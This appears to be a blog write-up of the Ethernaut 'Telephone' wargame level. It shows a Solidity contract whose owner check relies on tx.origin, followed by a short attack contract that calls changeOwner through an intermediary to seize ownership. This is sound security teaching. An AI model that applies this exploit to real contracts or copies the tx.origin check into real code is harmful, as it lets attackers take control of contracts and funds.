Wei's

Ethernaut - 4.Telephone

27 Aug 2022 ethernaut  solidity 

Difficulty: 🌕🌑🌑🌑🌑

Claim ownership of the contract below to complete this level.
Things that might help

See the Help page above, section “Beyond the console”

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

Writeup

To complete this level, we need to claim ownership of the contract. The keypoint is the difference between tx.origin and msg.sender.

  1. Get new instance
  2. Create a contract 
     // SPDX-License-Identifier: MIT
 pragma solidity ^0.6.0;

 interface Telephone {
     function changeOwner(address _owner) external;
 }

 contract AttackTelephone {
     Telephone public targets = Telephone(YOUR_LEVEL_INSTANCE_ADDRESS);

     function attackTelephone() public{
         targets.changeOwner(YOUR_ACCOUNT);
     }
 }
  3. Compile & deploy .
  4. Call attackTelephone function. In this scenario, tx.origin will be the victim’s address while msg.sender will be the malicious contract ( AttackTelephone ) ‘s address. ( tx.origin != msg.sender == true )
  5. Callthe method 
    
 await contract.owner().then(v => v.toString())

    to check owner if it is your account.

  6. Submit instance ξ( ✿>◡❛)

Reference

tx.origin vs msg.sender

Related posts

Archive

solidity picoCTF Go ethernaut linux leetcode blockchain sql react leetcode-top-interview array medium typescript smart-contract solana javascript java ethereum easy css Linux zsh ubuntu two-pointer next.js jekyll http hardhat golang ethers Secureum Rust web wallet vscode typeorm truffle stack shell rpc notion notes nodejs nextjs mocha html github git geth express eslint docker cloudflare Vim DSA